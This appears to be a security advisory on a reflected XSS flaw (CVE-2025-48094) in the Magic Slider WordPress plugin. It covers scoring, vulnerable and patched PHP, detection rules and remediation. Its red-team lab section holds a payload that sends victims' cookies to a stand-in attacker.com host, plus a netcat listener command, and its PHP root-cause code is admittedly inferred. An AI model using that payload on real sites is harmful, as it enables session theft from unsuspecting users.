Executive Summary

CVE-2025-48094 is a reflected Cross-Site Scripting (XSS) vulnerability in the Magic Slider WordPress plugin, developed by LambertGroup. The vulnerability exists in versions up to and including 2.2. An attacker can inject arbitrary JavaScript into a web page via a crafted URL, which executes in the context of the victim's browser when they click the link. This can lead to session hijacking, credential theft, or defacement. The vulnerability is classified as Reflected XSS (CWE-79) with a CVSS score of 7.1 (High). No public exploit code or patch is currently available, but the risk is elevated due to the widespread use of WordPress plugins.

Supply Chain & Package Security

This vulnerability affects a WordPress plugin distributed via the official WordPress plugin repository. Users who installed the plugin directly from the repository or via automatic updates are at risk. The plugin is not available on NPM, PyPI, Go, or Ruby ecosystems.

CVSS Breakdown & Threat Level

  • CVSS Score: 7.1 (High)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
  • Attack Vector: Network (AV:N) – The vulnerability is exploitable remotely.
  • Attack Complexity: Low (AC:L) – No special conditions required.
  • Privileges Required: None (PR:N) – No authentication needed.
  • User Interaction: Required (UI:R) – Victim must click a crafted link.
  • Scope: Changed (S:C) – The injected script can affect resources beyond the vulnerable component.
  • Confidentiality Impact: Low (C:L) – Limited data exposure.
  • Integrity Impact: Low (I:L) – Limited modification of content.
  • Availability Impact: Low (A:L) – Limited disruption.

Threat Level: High. Although the EPSS score is 0.0%, the lack of a patch and the widespread use of WordPress plugins make this a significant risk for unpatched installations.

Deep Dive & Mechanics

The vulnerability resides in the magic_slider parameter of the Magic Slider plugin. The plugin fails to properly sanitize user-supplied input before reflecting it in the HTTP response. An attacker can craft a URL like:

https://example.com/?magic_slider=<script>alert('XSS')</script>

When a victim visits this URL, the injected script executes in their browser. The plugin likely echoes the parameter value directly into the page without encoding or escaping, allowing arbitrary HTML/JavaScript injection.

Root Cause: The plugin uses echo $_GET['magic_slider']; or similar unsanitized output functions.

Attack Vector: Reflected XSS via URL parameter.

Impact: An attacker can steal session cookies, redirect users to malicious sites, or perform actions on behalf of the victim.

Vulnerable vs. Patched Code

Vulnerable Code (PHP):

<?php
// magic_slider.php
$slider_id = $_GET['magic_slider'];
echo "<div id='slider-$slider_id'>";
?>

Patched Code (PHP):

<?php
// magic_slider.php
$slider_id = isset($_GET['magic_slider']) ? sanitize_text_field($_GET['magic_slider']) : '';
echo "<div id='slider-" . esc_attr($slider_id) . "'>";
?>

The patched version uses sanitize_text_field() to strip dangerous characters and esc_attr() to encode output for safe HTML attribute insertion.

Exploitation & Lab Setup

Red Team (Offensive)

Lab Setup:

  1. Install WordPress with Magic Slider plugin version 2.2.
  2. Create a malicious URL:
    http://target-site.com/?magic_slider=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>

  3. Host a listener on attacker machine:
    nc -lvnp 80

  4. Send the crafted link to the victim via email or social engineering.

Exploit Code (Python):

import requests

target = "http://target-site.com/"
payload = "<script>alert('XSS')</script>"
url = f"{target}?magic_slider={payload}"
print(f"Send this URL to victim: {url}")

Blue Team (Defensive)

Detection:

  • Monitor web server logs for requests containing magic_slider= followed by <script> or other HTML tags.
  • Use WAF rules to block requests with suspicious parameters.

Mitigation:

  • Apply input validation and output encoding.
  • Disable the plugin until a patch is available.

Indicators of Compromise (IOCs)

  • URL Pattern: ?magic_slider=<script>...
  • HTTP Request: GET request with magic_slider parameter containing HTML/JavaScript.
  • Log Entry: GET /?magic_slider=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
  • Network Traffic: Outbound connections to attacker-controlled domains from victim browser.

Remediation & Mitigation

Immediate Actions:

  1. Disable the plugin until a patch is released.
  2. Implement a Web Application Firewall (WAF) rule to block requests containing magic_slider= with HTML tags.
  3. Monitor logs for exploitation attempts.

Long-term Fix:

  • Apply the patched code (see Vulnerable vs. Patched Code section) if you have access to the source.
  • Contact LambertGroup for an official patch.
  • Consider replacing the plugin with a secure alternative.

Workaround:

  • Add the following to .htaccess to block malicious requests:
    RewriteEngine On
    RewriteCond %{QUERY_STRING} magic_slider=.*<script [NC]
    RewriteRule .* - [F,L]
